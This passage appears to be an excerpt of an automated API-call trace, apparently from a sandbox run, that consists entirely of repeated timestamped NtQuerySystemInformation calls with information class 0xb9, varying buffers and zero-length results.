Length=0x0, ResultLength=0x0) [0241.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f220, Length=0x38, ResultLength=0x0) [0241.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0a0, Length=0x20, ResultLength=0x0) [0241.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x20, ResultLength=0x0) [0241.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x20, ResultLength=0x0) [0241.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f308, Length=0x58, ResultLength=0x0) [0241.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1e0, Length=0x38, ResultLength=0x0) [0241.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f020, Length=0x28, ResultLength=0x0) [0241.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f020, Length=0x28, ResultLength=0x0) [0241.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f020, Length=0x28, ResultLength=0x0) [0241.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f020, Length=0x28, ResultLength=0x0) [0241.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x28, ResultLength=0x0) [0241.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1e0, Length=0x38, ResultLength=0x0) [0241.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1e0, Length=0x38, ResultLength=0x0) [0241.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f110, Length=0x28, ResultLength=0x0) [0241.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f110, Length=0x28, ResultLength=0x0) [0241.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1e0, Length=0x38, ResultLength=0x0) [0241.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1e0, Length=0x38, ResultLength=0x0) [0241.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef80, Length=0x20, ResultLength=0x0) [0241.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef00, Length=0x20, ResultLength=0x0) [0241.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef00, Length=0x20, ResultLength=0x0) [0241.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef00, Length=0x20, ResultLength=0x0) [0241.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f150, Length=0x20, ResultLength=0x0) [0241.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1e0, Length=0x38, ResultLength=0x0) [0241.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x20, ResultLength=0x0) [0241.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eff0, Length=0x20, ResultLength=0x0) [0241.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eff0, Length=0x20, ResultLength=0x0) [0241.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eff0, Length=0x20, ResultLength=0x0) [0241.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1e0, Length=0x38, ResultLength=0x0) [0241.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x20, ResultLength=0x0) [0241.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eff0, Length=0x20, ResultLength=0x0) [0241.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eff0, Length=0x20, ResultLength=0x0) [0241.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eff0, Length=0x20, ResultLength=0x0) [0241.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1e0, Length=0x38, ResultLength=0x0) [0241.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x20, ResultLength=0x0) [0241.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f000, Length=0x20, ResultLength=0x0) [0241.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f000, Length=0x20, ResultLength=0x0) [0241.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f308, Length=0x58, ResultLength=0x0) [0241.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1d0, Length=0x58, ResultLength=0x0) [0241.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0f0, Length=0x38, ResultLength=0x0) [0241.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef20, Length=0x28, ResultLength=0x0) [0241.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef20, Length=0x28, ResultLength=0x0) [0241.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef20, Length=0x28, ResultLength=0x0) [0241.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef20, Length=0x28, ResultLength=0x0) [0241.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef90, Length=0x28, ResultLength=0x0) [0241.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0f0, Length=0x38, ResultLength=0x0) [0241.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f010, Length=0x28, ResultLength=0x0) [0241.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f010, Length=0x28, ResultLength=0x0) [0241.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0f0, Length=0x38, ResultLength=0x0) [0241.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef70, Length=0x20, ResultLength=0x0) [0241.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eef0, Length=0x20, ResultLength=0x0) [0241.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eef0, Length=0x20, ResultLength=0x0) [0241.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eef0, Length=0x20, ResultLength=0x0) [0241.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0f0, Length=0x38, ResultLength=0x0) [0241.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef70, Length=0x20, ResultLength=0x0) [0241.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef00, Length=0x20, ResultLength=0x0) [0241.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef00, Length=0x20, ResultLength=0x0) [0241.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1d0, Length=0x58, ResultLength=0x0) [0241.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0f0, Length=0x38, ResultLength=0x0) [0241.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef20, Length=0x28, ResultLength=0x0) [0241.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef20, Length=0x28, ResultLength=0x0) [0241.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef20, Length=0x28, ResultLength=0x0) [0241.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef20, Length=0x28, ResultLength=0x0) [0241.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef90, Length=0x28, ResultLength=0x0) [0241.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0f0, Length=0x38, ResultLength=0x0) [0241.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f010, Length=0x28, ResultLength=0x0) [0241.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f010, Length=0x28, ResultLength=0x0) [0241.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x20, ResultLength=0x0) [0241.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee30, Length=0x20, ResultLength=0x0) [0241.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee30, Length=0x20, ResultLength=0x0) [0241.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee30, Length=0x20, ResultLength=0x0) [0241.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0f0, Length=0x38, ResultLength=0x0) [0241.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0f0, Length=0x38, ResultLength=0x0) [0241.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef70, Length=0x20, ResultLength=0x0) [0241.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef00, Length=0x20, ResultLength=0x0) [0241.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef00, Length=0x20, ResultLength=0x0) [0241.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1d0, Length=0x58, ResultLength=0x0) [0241.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0f0, Length=0x38, ResultLength=0x0) [0241.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef20, Length=0x28, ResultLength=0x0) [0241.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef20, Length=0x28, ResultLength=0x0) [0241.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef20, Length=0x28, ResultLength=0x0) [0241.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef20, Length=0x28, ResultLength=0x0) [0241.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef90, Length=0x28, ResultLength=0x0) [0241.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0f0, Length=0x38, ResultLength=0x0) [0241.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f010, Length=0x28, ResultLength=0x0) [0241.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f010, Length=0x28, ResultLength=0x0) [0241.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f0f0, Length=0x38, ResultLength=0x0) [0241.922] 